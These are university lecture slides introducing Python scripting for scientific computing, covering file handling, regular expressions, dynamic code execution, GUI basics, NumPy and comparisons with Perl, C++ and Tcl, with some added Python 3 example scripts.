Lectures in INF3330: Problem Solving with High-Level Languages


Hans Petter Langtangen

Last updated: August 2007

Contents

About this course
Intro to Python programming
Frequently encountered tasks in Python
Python modules
Doc strings
Numerical Python
Regular expressions
Class programming in Python
Simple GUI programming with Python
Widget tour
More advanced GUI programming
Simple CGI programming in Python
Basic Bash programming
Intro to Perl programming
Frequently encountered tasks in Perl
Software engineering





About this course




What is a script?

Very high-level, often short, program
written in a high-level scripting language
Scripting languages: Unix shells, Tcl, Perl, Python, Ruby, Scheme, Rexx, JavaScript, VisualBasic, ...
This course: Python
+ a taste of Perl and Bash (Unix shell)



Characteristics of a script

Glue other programs together
Extensive text processing
File and directory manipulation
Often special-purpose code
Many small interacting scripts may yield a big system
Perhaps a special-purpose GUI on top
Portable across Unix, Windows, Mac
Interpreted program (no compilation+linking)



Why not stick to Java or C/C++?

Features of Perl and Python compared with Java, C/C++ and Fortran:

shorter, more high-level programs
much faster software development
more convenient programming
you feel more productive
Two main reasons:

no variable declarations,
but lots of consistency checks at run time
lots of standardized libraries and tools



Scripts yield short code (1)

Consider reading real numbers from a file, where each line can contain an arbitrary number of real numbers:
1.1  9   5.2
1.762543E-02
0 0.01 0.001

9 3 7
Python solution:
F = open(filename, 'r')
n = F.read().split()
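A minimal sketch of the same idea as a complete script, written in Python 3 syntax (the slides use Python 2). The function name read_numbers and the temporary file are illustrative assumptions. Note that split() returns strings, so float() is applied to obtain numbers:

```python
import os
import tempfile

def read_numbers(filename):
    """Return all whitespace-separated numbers in a file as floats."""
    with open(filename, 'r') as f:
        # read() returns the whole file as one string; split() without
        # arguments splits on any whitespace, including newlines
        return [float(word) for word in f.read().split()]

# write the sample data from the slide to a temporary file
sample = "1.1  9   5.2\n1.762543E-02\n0 0.01 0.001\n\n9 3 7\n"
with tempfile.NamedTemporaryFile('w', suffix='.dat', delete=False) as tmp:
    tmp.write(sample)

numbers = read_numbers(tmp.name)
os.remove(tmp.name)
print(numbers)
```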



Scripts yield short code (2)

Perl solution:
open F, $filename; 
$s = join "", <F>; 
@n = split ' ', $s;
Doing this in C++ or Java requires at least a loop, and in Fortran and C quite some code lines are necessary



Using regular expressions (1)

Suppose we want to read complex numbers written as text
(-3, 1.4)  or  (-1.437625E-9, 7.11)  or  (  4, 2 )
Python solution:
m = re.search(r'\(\s*([^,]+)\s*,\s*([^,]+)\s*\)', 
              '(-3,1.4)')
re, im = [float(x) for x in m.groups()]
Perl solution:
$s="(-3, 1.4)"; 
($re,$im)= $s=~ /\(\s*([^,]+)\s*,\s*([^,]+)\s*\)/;



Using regular expressions (2)

Regular expressions like
\(\s*([^,]+)\s*,\s*([^,]+)\s*\)
constitute a powerful language for specifying text patterns
Doing the same thing, without regular expressions, in Fortran and C requires quite some low-level code at the character array level
Remark: we could read pairs (-3, 1.4) without using regular expressions,
s = '(-3,  1.4 )'
re, im = s[1:-1].split(',')
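The two approaches can be compared in a small sketch (Python 3 syntax; the function names parse_complex and parse_complex_split are made up for this illustration). Both convert the extracted text to floats, since the regex groups and the result of split are strings:

```python
import re

# pattern from the slides: "(" real "," imag ")" with optional whitespace
COMPLEX_RE = re.compile(r'\(\s*([^,]+)\s*,\s*([^,]+)\s*\)')

def parse_complex(text):
    """Return the first '(re, im)' pair found in text as a complex number."""
    m = COMPLEX_RE.search(text)
    if m is None:
        raise ValueError('no complex number found in %r' % text)
    real, imag = [float(x) for x in m.groups()]
    return complex(real, imag)

def parse_complex_split(text):
    """Same result without regular expressions; text must be exactly '(re, im)'."""
    real, imag = text.strip()[1:-1].split(',')
    return complex(float(real), float(imag))

for s in '(-3, 1.4)', '(-1.437625E-9, 7.11)', '(  4, 2 )':
    print(parse_complex(s), parse_complex_split(s))
```

The regex version also finds a pair embedded in surrounding text, while the split version assumes the string contains nothing but the pair.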



Script variables are not declared

Example of a Python function:
def debug(leading_text, variable):
    if os.environ.get('MYDEBUG', '0') == '1':
        print leading_text, variable
Dumps any printable variable
(number, list, hash, heterogeneous structure)
Printing can be turned on/off by setting the environment variable MYDEBUG



The same function in C++

Templates can be used to mimic dynamically typed languages
Not as quick and convenient programming:
template <class T>
void debug(std::ostream& o, 
           const std::string& leading_text, 
           const T& variable)
{ 
  char* c = getenv("MYDEBUG");
  bool defined = false;
  if (c != NULL) {  // if MYDEBUG is defined ...
    if (std::string(c) == "1") {  // if MYDEBUG is true ...
      defined = true;
    }
  }
  if (defined) {
    o <<  leading_text << " " << variable << std::endl; 
  }
}



The relation to OOP

Object-oriented programming can also be used to parameterize types
Introduce base class A and a range of subclasses, all with a (virtual) print function
Let debug work with var as an A reference
Now debug works for all subclasses of A
Advantage: complete control of the legal variable types that debug is allowed to print (may be important in big systems to ensure that a function can only make transactions with certain objects)
Disadvantage: much more work, much more code, less reuse of debug in new situations



Flexible function interfaces

User-friendly environments (Matlab, Maple, Mathematica, S-Plus, ...) allow flexible function interfaces
Novice user:
# f is some data
plot(f)
More control of the plot:
plot(f, label='f', xrange=[0,10])
More fine-tuning:
plot(f, label='f', xrange=[0,10], title='f demo',
     linetype='dashed', linecolor='red')



Keyword arguments

Keyword arguments = function arguments with keywords and default values, e.g.,
def plot(data, label='', xrange=None, title='',
         linetype='solid', linecolor='black', ...)
The sequence and number of arguments in the call can be chosen by the user
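A small sketch of how such calls behave (Python 3 syntax). The plot function here is only a stand-in that returns the settings in effect instead of drawing anything, and the elided arguments of the original signature are left out:

```python
def plot(data, label='', xrange=None, title='',
         linetype='solid', linecolor='black'):
    """Stand-in for a real plot function: return the settings in effect."""
    return {'npoints': len(data), 'label': label, 'xrange': xrange,
            'title': title, 'linetype': linetype, 'linecolor': linecolor}

f = [0.0, 0.5, 1.0]                           # some data

basic = plot(f)                               # all defaults
custom = plot(f, linecolor='red', label='f')  # keywords in any order

print(basic)
print(custom)
```

Arguments that are not mentioned in the call keep their default values, so the novice call and the fine-tuned call can share one function.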



Testing a variable's type

Inside the function one can test on the type of argument provided by the user
xrange can be left out (value None), or given as a 2-element list (xmin/xmax), or given as a string 'xmin:xmax', or given as a single number (meaning 0:number) etc.
if xrange is not None:  # i.e. xrange is specified by the user
    if isinstance(xrange, list):      # list [xmin,xmax] ?
        xmin = xrange[0];  xmax = xrange[1]
    elif isinstance(xrange, str):     # string 'xmin:xmax' ?
        xmin, xmax = re.search(r'(.*):(.*)',xrange).groups()
    elif isinstance(xrange, float):   # just a float?
        xmin = 0;  xmax = xrange
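The type tests can be collected in a helper, sketched here in Python 3 syntax. The name parse_xrange is an assumption for this example; unlike the fragment above, the sketch also converts the string pieces to floats and accepts tuples and integers:

```python
def parse_xrange(xrange=None):
    """Return (xmin, xmax) as floats, or None if no range was given."""
    if xrange is None:                        # left out by the user
        return None
    if isinstance(xrange, (list, tuple)):     # [xmin, xmax]
        xmin, xmax = xrange
    elif isinstance(xrange, str):             # 'xmin:xmax'
        xmin, xmax = xrange.split(':')
    elif isinstance(xrange, (int, float)):    # single number: 0:number
        xmin, xmax = 0, xrange
    else:
        raise TypeError('cannot interpret xrange=%r' % (xrange,))
    return float(xmin), float(xmax)

print(parse_xrange([0, 10]))
print(parse_xrange('2:5.5'))
print(parse_xrange(7))
```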



Classification of languages (1)

Many criteria can be used to classify computer languages
Dynamically vs statically typed languages
Python (dynamic):
c = 1            # c is an integer
c = [1,2,3]      # c is a list
C (static):
double c; c = 5.2;   // c can only hold doubles
c = "a string...";   // compiler error



Classification of languages (2)

Weakly vs strongly typed languages
Perl (weak):
$b = '1.2';
$c = 5*$b;   # implicit type conversion: '1.2' -> 1.2
Python (strong):
b = '1.2'
c = 5*b      # no implicit conversion: gives the string '1.21.21.21.21.2', not 6.0
c = 5+b      # illegal (TypeError); no implicit type conversion
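A short sketch of what Python actually does with the string '1.2' (Python 3 syntax; the variable names are chosen for this illustration only). The string is never silently turned into a number, so the conversion has to be written explicitly:

```python
b = '1.2'

repeated = 5*b           # int*str is string repetition, not arithmetic
product = 5*float(b)     # explicit conversion gives a number

try:
    total = 5 + b        # int + str is not defined
except TypeError as e:
    total = None
    message = str(e)

print(repeated)
print(product)
print(message)
```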



Classification of languages (3)

Interpreted vs compiled languages
Dynamically vs statically typed (or type-safe) languages
High-level vs low-level languages (Python-C)
Very high-level vs high-level languages (Python-C)
Scripting vs system languages



Turning files into code (1)

Code can be constructed and executed at run-time
Consider an input file with the syntax
a = 1.2
no of iterations = 100
solution strategy = 'implicit'
c1 = 0
c2 = 0.1
A = 4
c3 = StringFunction('A*sin(x)')
How can we read this file and define variables a, no_of_iterations, solution_strategy, c1, c2, A with the specified values?
And can we make c3 a function c3(x) as specified?
Yes!



Turning files into code (2)

The answer lies in this short and generic code:
import re
file = open('inputfile.dat', 'r')
for line in file:
    # split at = and strip surrounding whitespace
    variable, value = [s.strip() for s in line.split('=')]
    # replace blanks on the left-hand side of = by _
    variable = re.sub(' ', '_', variable)
    exec(variable + '=' + value)   # magic...
This cannot be done in Fortran, C, C++ or Java!
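A self-contained sketch of this technique in Python 3 syntax. The function name read_assignments is an assumption, the StringFunction line is left out because that class is not defined here, and the variables are collected in a dictionary rather than in the global namespace. Since exec runs arbitrary code, this is only reasonable for input files you trust:

```python
import re

def read_assignments(lines):
    """Execute lines of the form 'some name = value'; return the variables."""
    namespace = {}
    for line in lines:
        if '=' not in line:
            continue                           # skip blank or odd lines
        variable, value = [s.strip() for s in line.split('=', 1)]
        variable = re.sub(' ', '_', variable)  # blanks are illegal in names
        exec(variable + ' = ' + value, namespace)
    return namespace

inputfile = """\
a = 1.2
no of iterations = 100
solution strategy = 'implicit'
c1 = 0
c2 = 0.1
A = 4
"""
ns = read_assignments(inputfile.splitlines())
print(ns['a'], ns['no_of_iterations'], ns['solution_strategy'])
```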



Turning files into code; more advanced example

Here is a similar input file but with some additional difficulties (strings without quotes and verbose function expressions as values):
set heat conduction = 5.0
set dt = 0.1
set rootfinder = bisection
set source = V*exp(-q*t) is function of (t) with V=0.1, q=1
set bc = sin(x)*sin(y)*exp(-0.1*t) is function of (x,y,t)
Can we read such files and define variables and functions?
(here heat_conduction, dt and rootfinder, with the specified values, and source and bc as functions)
Yes! It is non-trivial and requires some advanced Python



Implementation (1)

# target line:
# set some name of variable = some value
import re
from py4cs import misc

def parse_file(somefile):
    namespace = {}    # holds all newly created variables
    line_re = re.compile(r'set (.*?)=(.*)$')
    for line in somefile:
        m = line_re.search(line)
        if m:
            variable = m.group(1).strip()
            value = m.group(2).strip()
            # test if value is a StringFunction specification:
            if value.find('is function of') >= 0:
                # interpret function specification:
                value = eval(string_function_parser(value))
            else:
                value = misc.str2obj(value)  # string -> object
            # space in variables names is illegal
            variable = variable.replace(' ', '_')
            code = 'namespace["%s"] = value' % variable
            exec code
    return namespace



Implementation (2)

# target line (with parameters A and q):
# expression is function of (x,y) with A=1, q=2
# or (no parameters)
# expression is function of (t)

def string_function_parser(text):
    m = re.search(r'(.*) is function of \((.*)\)( with .+)?', text)
    if m:
        expr = m.group(1).strip();  args = m.group(2).strip()
        # the 3rd group is optional:
        prms = m.group(3)
        if prms is None:  # the 3rd group is optional
            prms = ''     # works fine below
        else:
            prms = ''.join(prms.split()[1:])  # strip off 'with'

        # quote arguments:
        args = ', '.join(["'%s'" % v for v in args.split(',')])
        if args.find(',') < 0:  # single argument?
            args = args + ','   # add comma in tuple
        args = '(' + args + ')' # tuple needs parenthesis
            
        s = "StringFunction('%s', independent_variables=%s, %s)" % \
            (expr, args, prms)
        return s
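To see what the regular expression in string_function_parser extracts, here is a reduced sketch in Python 3 syntax. The helper name split_function_spec is hypothetical, and the sketch stops before the StringFunction call string is built:

```python
import re

# same pattern as in string_function_parser
SPEC_RE = re.compile(r'(.*) is function of \((.*)\)( with .+)?')

def split_function_spec(text):
    """Return (expression, argument names, parameter string) or None."""
    m = SPEC_RE.search(text)
    if m is None:
        return None
    expr = m.group(1).strip()
    args = [a.strip() for a in m.group(2).split(',')]
    prms = m.group(3)                        # None if ' with ...' is absent
    prms = '' if prms is None else ''.join(prms.split()[1:])
    return expr, args, prms

print(split_function_spec(
    'V*exp(-q*t) is function of (t) with V=0.1, q=1'))
print(split_function_spec(
    'sin(x)*sin(y)*exp(-0.1*t) is function of (x,y,t)'))
```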



GUI programming made simple

Python has interfaces to many GUI libraries
(Gtk, Qt, MFC, java.awt, java.swing, wxWindows, Tk)
The simplest library to use: Tk
Python + Tk = rapid GUI development
Wrap your scripts with a GUI in half a day
Easy for others to use your tools
Indispensable for demos
Quite complicated GUIs can also be made with Tk (and extensions)



GUI: Python vs C

Make a window on the screen with the text 'Hello World'
C + X11: 176 lines of ugly code
Python + Tk: 6 lines of readable code
#!/usr/bin/env python
from Tkinter import *
root = Tk()
Label(root, text='Hello, World!',
      foreground="white", background="black").pack()
root.mainloop()
Java and C++ codes are longer than Python + Tk



Web GUI

Many applications need a GUI accessible through a Web page
Perl and Python have extensive support for writing (server-side) dynamic Web pages (CGI scripts)
Perl and Python are central tools in the e-commerce explosion
Leading tools such as Plone and Zope (for dynamic web sites) are Python based



Tcl vs. C++; example (1)

Database application

C++ version implemented first
Tcl version had more functionality
C++ version: 2 months
Tcl version: 1 day
Effort ratio: 60
From a paper by John Ousterhout (the father of Tcl/Tk): 'Scripting: Higher-Level Programming for the 21st Century'



Tcl vs. C++; example (2)

Database library

C++ version implemented first
C++ version: 2-3 months
Tcl version: 1 week
Effort ratio: 8-12



Tcl vs. C; example

Display oil well production curves

Tcl version implemented first
C version: 3 months
Tcl version: 2 weeks
Effort ratio: 6



Tcl vs. Java; example

Simulator and GUI

Tcl version implemented first
Tcl version had somewhat more functionality
Java version: 3400 lines, 3-4 weeks
Tcl version: 1600 lines, 1 week
Effort ratio: 3-4



Scripts can be slow

Perl and Python scripts are first compiled to byte-code
The byte-code is then interpreted
Text processing is usually as fast as in C
Loops over large data structures might be very slow
for i in range(len(A)):
    A[i] = ...
Fortran, C and C++ compilers are good at optimizing such loops at compile time and produce very efficient assembly code (e.g. 100 times faster)
Fortunately, long loops in scripts can easily be migrated to Fortran or C



Scripts may be fast enough (1)

Read 100 000 (x,y) data from file and
write (x,f(y)) out again

Pure Python: 4s
Pure Perl: 3s
Pure Tcl: 11s
Pure C (fscanf/fprintf): 1s
Pure C++ (iostream): 3.6s
Pure C++ (buffered streams): 2.5s
Numerical Python modules: 2.2s (!)
Remark: in practice, 100 000 data points are written and read in binary format, resulting in much smaller differences



Scripts may be fast enough (2)

Read a text in a human language and generate random nonsense text in that language (from "The Practice of Programming" by B. W. Kernighan and R. Pike, 1999):
Language        | CPU-time (s) | lines of code
C               |    0.30      |      150
Java            |    9.2       |      105
C++ (STL-deque) |   11.2       |       70
C++ (STL-list)  |    1.5       |       70
Awk             |    2.1       |       20
Perl            |    1.0       |       18
Machine: Pentium II running Windows NT



When scripting is convenient (1)

The application's main task is to connect together existing components
The application includes a graphical user interface
The application performs extensive string/text manipulation
The design of the application code is expected to change significantly
CPU-time intensive parts can be migrated to C/C++ or Fortran



When scripting is convenient (2)

The application can be made short if it operates heavily on list or hash structures
The application is supposed to communicate with Web servers
The application should run without modifications on Unix, Windows, and Macintosh computers, also when a GUI is included



When to use C, C++, Java, Fortran

Does the application implement complicated algorithms and data structures?
Does the application manipulate large datasets so that execution speed is critical?
Are the application's functions well-defined and changing slowly?
Will type-safe languages be an advantage, e.g., in large development teams?



Some personal applications of scripting

Get the power of Unix also in non-Unix environments
Automate manual interaction with the computer
Customize your own working environment and become more efficient
Increase the reliability of your work
(what you did is documented in the script)
Have more fun!



Some business applications of scripting

Perl and Python are very popular in the open source movement and Linux environments
Perl and Python are widely used for creating Web services and administering computer systems
Perl and Python (and Tcl) replace 'home-made' (application-specific) scripting interfaces
Many companies want candidates with Perl/Python experience



What about mission-critical operations?

Scripting languages are free
What about companies that do mission-critical operations?
Can we use Perl or Python when sending a man to Mars?
Who is responsible for the quality of products like Perl and Python?



The reliability of scripting tools

Scripting languages are developed as a world-wide collaboration of volunteers (open source model)
The open source community as a whole is responsible for the quality
There is a single source for Perl and for Python
This source is read, tested and controlled by a very large number of people (and experts)
The reliability of large open source projects like Linux, Perl, and Python appears to be very good - at least as good as commercial software



This course

Scripting in general, but with most examples taken from scientific computing
Aimed at novice scripters
Flavor of lectures: 'getting started'
Jump into useful scripts and dissect the code
Learn more by programming
Find examples, look up man pages, Web docs and textbooks on demand
Get the overview
Customize existing code
Have fun and work with useful things



Practical problem solving

Problem: you are not an expert (yet)
Where to find detailed info, and how to understand it?
The efficient programmer navigates quickly in the jungle of textbooks, man pages, README files, source code examples, Web sites, news groups, ... and has a gut feeling for what to look for
The aim of the course is to improve your practical problem-solving abilities
You think you know when you learn, are more sure when you can write, even more when you can teach, but certain when you can program (Alan Perlis)



Contents of the course

Dissection of complete introductory scripts
Lists of common tasks (recipes!)
Regular expressions and text processing
CGI programming (dynamic Web pages)
GUI programming with Python
Creating effective working environments
Combining Python with C/C++ or Fortran
Software engineering
(documentation, modules, version control)



Why Perl AND Python?





Intro to Python programming




Make sure you have the software

You will need Python in recent versions (at least v2.2)
Several add-on modules are needed later on in the slides
Here is a list of software needed for the Python part:
http://folk.uio.no/hpl/scripting/softwarelist.html



Material associated with these slides

These slides have a companion book:
Scripting in Computational Science, 2nd edition,
Texts in Computational Science and Engineering,
Springer, 2006
Currently, we are working on the 3rd edition
All examples can be downloaded as a tarfile
http://folk.uio.no/hpl/scripting/scripting-src.tar.gz



Installing scripting-src.tar.gz

Unpack scripting-src.tar.gz in a directory and let scripting be an environment variable pointing to the top directory:
tar xvzf scripting-src.tar.gz
export scripting=`pwd`
All paths in these slides are given relative to scripting, e.g., src/py/intro/hw.py is reached as
$scripting/src/py/intro/hw.py



Scientific Hello World script

All computer language intros start with a program that prints "Hello, World!" to the screen
Scientific computing extension: add reading a number and computing its sine value
The script (hw.py) should be run like this:
python hw.py 3.4
or just (Unix)
./hw.py 3.4
Output:
Hello, World! sin(3.4)=-0.255541102027



Purpose of this script

Demonstrate

how to read a command-line argument
how to call a math (sine) function
how to work with variables
how to print text and numbers



The code

File hw.py:
#!/usr/bin/env python

# load system and math module:
import sys, math       

# extract the 1st command-line argument:
r = float(sys.argv[1]) 

s = math.sin(r)

print "Hello, World! sin(" + str(r) + ")=" + str(s)
Make the file executable (on Unix):
chmod a+rx hw.py



Comments

The first line specifies the interpreter of the script
(here the first python program in your path)
python hw.py 1.4   # first line is treated as a comment
./hw.py 1.4        # first line is used to specify an interpreter
Even simple scripts must load modules:
import sys, math  
Numbers and strings are two different types:
r = sys.argv[1]         # r is string
s = math.sin(float(r))  # sin expects number, not string r
                        # s becomes a floating-point number



Alternative print statements

Desired output:
Hello, World! sin(3.4)=-0.255541102027
String concatenation:
print "Hello, World! sin(" + str(r) + ")=" + str(s)
C printf-like statement:
print "Hello, World! sin(%g)=%g" % (r,s)
Variable interpolation:
print "Hello, World! sin(%(r)g)=%(s)g" % vars()
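The three alternatives can be tried side by side. This sketch uses Python 3 syntax, where print is a function, and stores the strings in variables (names chosen for this example) before printing them:

```python
import math

r = 3.4
s = math.sin(r)

# string concatenation: str(s) gives all significant digits
concat = "Hello, World! sin(" + str(r) + ")=" + str(s)

# printf-like formatting: %g keeps six significant digits
printf_like = "Hello, World! sin(%g)=%g" % (r, s)

# variable interpolation: names are looked up in the dictionary vars()
interpolated = "Hello, World! sin(%(r)g)=%(s)g" % vars()

print(concat)
print(printf_like)
print(interpolated)
```

The %g format rounds to six significant digits, so the last two lines show fewer decimals than the concatenated version.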



printf format strings

%d     : integer
%5d    : integer in a field of width 5 chars
%-5d   : integer in a field of width 5 chars,
         but adjusted to the left
%05d   : integer in a field of width 5 chars,
         padded with zeroes from the left
%g     : float variable in %f or %e notation
%e     : float variable in scientific notation
%11.3e : float variable in scientific notation,
         with 3 decimals, field of width 11 chars
%5.1f  : float variable in fixed decimal notation,
         with one decimal, field of width 5 chars
%.3f   : float variable in fixed decimal form,
         with three decimals, field of min. width
%s     : string
%-20s  : string in a field of width 20 chars,
         and adjusted to the left
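A quick way to get a feel for these formats is to print a few values inside brackets so that the field width becomes visible. The sketch below uses Python 3 syntax, and the sample values are arbitrary:

```python
n = 42
x = 1234.5678
p = 3.14159

examples = [
    ('%d',     n),
    ('%5d',    n),
    ('%-5d',   n),
    ('%05d',   n),
    ('%g',     x),
    ('%e',     x),
    ('%11.3e', x),
    ('%5.1f',  p),
    ('%.3f',   p),
    ('%s',     'abc'),
    ('%-20s',  'abc'),
]
for fmt, value in examples:
    # the brackets mark the start and end of each formatted field
    print('%-8s -> [%s]' % (fmt, fmt % value))
```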



Strings in Python

Single- and double-quoted strings work in the same way
s1 = "some string with a number %g" % r
s2 = 'some string with a number %g' % r  # = s1
Triple-quoted strings can be multi line with embedded newlines:
text = """
large portions of a text
can be conveniently placed
inside triple-quoted strings
(newlines are preserved)"""
Raw strings, where backslash is backslash:
s3 = r'\(\s+\.\d+\)'
# with ordinary string (must quote backslash):
s3 = '\\(\\s+\\.\\d+\\)'



Where to find Python info

Make a bookmark for $scripting/doc.html
Follow link to Index to Python Library Reference
(complete on-line Python reference)
Click on Python keywords, modules etc.
Online alternative: pydoc, e.g., pydoc math
pydoc lists all classes and functions in a module
Alternative: Python in a Nutshell (or Beazley's textbook)
Recommendation: use these slides and associated book together with the Python Library Reference, and learn by doing exercises!



New example: reading/writing data files

Tasks:

Read (x,y) data from a two-column file
Transform y values to f(y)
Write (x,f(y)) to a new file
What to learn:

How to open, read, write and close files
How to write and call a function
How to work with arrays (lists)
File: src/py/intro/datatrans1.py



Reading input/output filenames

Usage:
./datatrans1.py infilename outfilename
Read the two command-line arguments:
input and output filenames
infilename  = sys.argv[1]
outfilename = sys.argv[2]
Command-line arguments are in sys.argv[1:]
sys.argv[0] is the name of the script



Exception handling

What if the user fails to provide two command-line arguments?
Python aborts execution with an informative error message
Manual handling of errors:
try:
    infilename  = sys.argv[1]
    outfilename = sys.argv[2]
except IndexError:
    # try block failed,
    # fewer than two command-line arguments were given
    print 'Usage:', sys.argv[0], 'infile outfile'
    sys.exit(1)
This is the common way of dealing with errors in Python, called exception handling
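The same logic can be wrapped in a function so that it is easy to try with different argument lists. This is a sketch in Python 3 syntax, and the function name get_filenames is an assumption. Indexing a list that is too short raises IndexError, which is the exception caught here:

```python
import sys

def get_filenames(argv):
    """Return (infilename, outfilename) from an argument list like sys.argv."""
    try:
        infilename = argv[1]
        outfilename = argv[2]
    except IndexError:
        # fewer than two command-line arguments were given
        print('Usage:', argv[0], 'infile outfile')
        sys.exit(1)
    return infilename, outfilename

print(get_filenames(['datatrans1.py', 'in.dat', 'out.dat']))
```

sys.exit raises the exception SystemExit, so a calling program can catch it if it should not terminate.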



Open file and read line by line

Open files:
ifile = open( infilename, 'r')  # r for reading
ofile = open(outfilename, 'w')  # w for writing

afile = open(appfilename, 'a')  # a for appending
Read line by line:
for line in ifile:
    # process line
Observe: blocks are indented; no braces!



Defining a function

import math

def myfunc(y):
    if y >= 0.0:  
        return y**5*math.exp(-y)
    else:         
        return 0.0


# alternative way of calling module functions
# (gives more math-like syntax in this example):

from math import *
def myfunc(y):
    if y >= 0.0:  
        return y**5*exp(-y)
    else:         
        return 0.0



Data transformation loop

Input file format: two columns with numbers
0.1   1.4397
0.2   4.325
0.5   9.0
Read (x,y), transform y, write (x,f(y)):
for line in ifile:
    pair = line.split()
    x = float(pair[0]); y = float(pair[1])
    fy = myfunc(y)  # transform y value
    ofile.write('%g  %12.5e\n' % (x,fy))
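Putting the pieces together, a complete version of the transformation might look like the sketch below. It uses Python 3 syntax and is not the actual datatrans1.py; the function name transform_file, the temporary directory and the skipping of malformed lines are assumptions made for this example:

```python
import math
import os
import tempfile

def myfunc(y):
    if y >= 0.0:
        return y**5*math.exp(-y)
    else:
        return 0.0

def transform_file(infilename, outfilename):
    """Read (x,y) pairs from infilename, write (x,f(y)) to outfilename."""
    with open(infilename, 'r') as ifile, open(outfilename, 'w') as ofile:
        for line in ifile:
            pair = line.split()
            if len(pair) != 2:
                continue          # skip blank or malformed lines
            x = float(pair[0]); y = float(pair[1])
            fy = myfunc(y)        # transform y value
            ofile.write('%g  %12.5e\n' % (x, fy))

# try it on the three sample lines from the slide
workdir = tempfile.mkdtemp()
infile = os.path.join(workdir, 'in.dat')
outfile = os.path.join(workdir, 'out.dat')
with open(infile, 'w') as f:
    f.write('0.1   1.4397\n0.2   4.325\n0.5   9.0\n')

transform_file(infile, outfile)
with open(outfile, 'r') as f:
    result = f.read().splitlines()
print('\n'.join(result))
```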



Alternative file reading

This construction is more flexible and traditional in Python (and a bit strange...):
while 1:
    line = ifile.readline()  # read a line
    if not line: break
    # process line
i.e., an 'infinite' loop with the termination criterion inside the loop



Loading data into lists

Read input file into list of lines:
lines = ifile.readlines()
Now the 1st line is lines[0], the 2nd is lines[1], etc.
Store x and y data in lists:
# go through each line, 
# split line into x and y columns

x = []; y = []   # store data pairs in lists x and y

for line in lines:
    xval, yval = line.split()
    x.append(float(xval))
    y.append(float(yval))
See src/py/intro/datatrans2.py for this version



Loop over list entries

For-loop in Python:
for i in range(start,stop,inc):
    ...
for j in range(stop):
    ...
generates
i = start, start+inc, start+2*inc, ..., stop-1
j = 0, 1, 2, ..., stop-1
Loop over (x,y) values:
ofile = open(outfilename, 'w') # open for writing

for i in range(len(x)):
    fy = myfunc(y[i])  # transform y value
    ofile.write('%g  %12.5e\n' % (x[i], fy))

ofile.close()
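A few concrete range calls make the pattern clearer (Python 3 syntax, where range must be wrapped in list to show its values). The last value is the largest start+k*inc below stop, which equals stop-1 only when the increment lines up. The sample lists x and y are made up for the illustration:

```python
print(list(range(3)))          # 0, 1, 2
print(list(range(2, 6)))       # 2, 3, 4, 5
print(list(range(2, 10, 3)))   # 2, 5, 8 (9 is not reached)

x = [0.1, 0.2, 0.5]
y = [1.0, 2.0, 3.0]

# loop over indices, as in the slides
pairs_by_index = [(x[i], y[i]) for i in range(len(x))]

# alternative: loop over the two lists in parallel with zip
pairs_by_zip = [(xi, yi) for xi, yi in zip(x, y)]

print(pairs_by_index == pairs_by_zip)
```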



Running the script

Method 1: write just the name of the scriptfile:
./datatrans1.py infile outfile

# or
datatrans1.py infile outfile
if . (current working directory) or the directory containing datatrans1.py is in the path
Method 2: run an interpreter explicitly:
python datatrans1.py infile outfile
Use the first python program found in the path
This works on Windows too (method 1 requires the right assoc/ftype bindings for .py files)



More about headers

In method 1, the interpreter to be used is specified in the first line
Explicit path to the interpreter:
#!/usr/local/bin/python
or perhaps your own Python interpreter:
#!/home/hpl/projects/scripting/Linux/bin/python
Using env to find the first Python interpreter in the path:
#!/usr/bin/env python



Are scripts compiled?

Yes and no, depending on how you see it
Python first compiles the script into bytecode
The bytecode is then interpreted
No linking with libraries; libraries are imported dynamically when needed
It appears as if there is no compilation
Quick development: just edit the script and run!
(no time-consuming compilation and linking)
Extensive error checking at run time



Python and error checking

Easy to introduce intricate bugs?

no declaration of variables
functions can "eat anything"
No, extensive consistency checks at run time replace the need for static typing and compile-time checks
Example: sending a string to the sine function, math.sin('t'), triggers a run-time error (type incompatibility)
Example: try to open a non-existing file
./datatrans1.py qqq someoutfile
Traceback (most recent call last):
  File "./datatrans1.py", line 12, in ?
    ifile = open( infilename, 'r')
IOError: [Errno 2] No such file or directory: 'qqq'
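Both run-time checks can be provoked and caught in a few lines. The sketch uses Python 3 syntax, where IOError is an alias for OSError; the list errors and the temporary directory are only there to make the example self-contained:

```python
import errno
import math
import os
import tempfile

errors = []

try:
    math.sin('t')                      # string sent to the sine function
except TypeError as e:
    errors.append(('TypeError', str(e)))

# a file name that is guaranteed not to exist
missing = os.path.join(tempfile.mkdtemp(), 'qqq')
try:
    ifile = open(missing, 'r')
except IOError as e:
    errors.append(('IOError', e.errno))

for name, info in errors:
    print(name, info)
```

Without the try-except blocks, each error would abort the script with a traceback like the one shown above.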



Computing with arrays

x and y in datatrans2.py are lists
We can compute with lists element by element (as shown)
However: using Numerical Python (NumPy) arrays instead of lists is much more efficient and convenient
Numerical Python is an extension of Python: a new fixed-size array type and lots of functions operating on such arrays



A first glimpse of NumPy

Import (more on this later...):
from py4cs.numpytools import *
x = sequence(0, 1, 0.001)  # 0.0, 0.001, 0.002, ..., 1.0
x = sin(x)                 # computes sin(x[0]), sin(x[1]) etc.
x=sin(x) is 13 times faster than an explicit loop:
for i in range(len(x)):
    x[i] = sin(x[i])
because sin(x) invokes an efficient loop in C



Loading file data into NumPy arrays

A special module loads tabular file data into NumPy arrays:
import py4cs.filetable
f = open(infilename, 'r')
x, y = py4cs.filetable.read_columns(f)
f.close()
Now we can compute with the NumPy arrays x and y:
from py4cs.numpytools import *  # import everything in NumPy
x = 10*x
y = 2*y + 0.1*sin(x)
We can easily write x and y back to a file:
f = open(outfilename, 'w')
py4cs.filetable.write_columns(f, x, y)
f.close()



More on computing with NumPy arrays

Multi-dimensional arrays can be constructed:
x = zeros(n, Float)  # array with indices 0,1,...,n-1
x = zeros((m,n), Float)    # two-dimensional array
x[i,j] = 1.0               # indexing
x = zeros((p,q,r), Float)  # three-dimensional array
x[i,j,k] = -2.1
x = sin(x)*cos(x)
We can plot one-dimensional arrays:
from py4cs.anyplot.gnuplot_ import *
x = sequence(0, 2, 0.1)
y = x + sin(10*x)
plot(x, y)
NumPy has lots of math functions and operations
SciPy is a comprehensive extension of NumPy
NumPy + SciPy is a kind of Matlab replacement for many people



Interactive Python

Python statements can be run interactively in a Python shell
The "best" shell is called IPython
Sample session with IPython:
Unix/DOS> ipython
...
In [1]:3*4-1
Out[1]:11

In [2]:from math import *

In [3]:x = 1.2

In [4]:y = sin(x)

In [5]:x
Out[5]:1.2

In [6]:y
Out[6]:0.93203908596722629



Editing capabilities in IPython

Up- and down-arrows: go through command history
Emacs key bindings for editing previous commands
The underscore variable holds the last output
In [6]:y
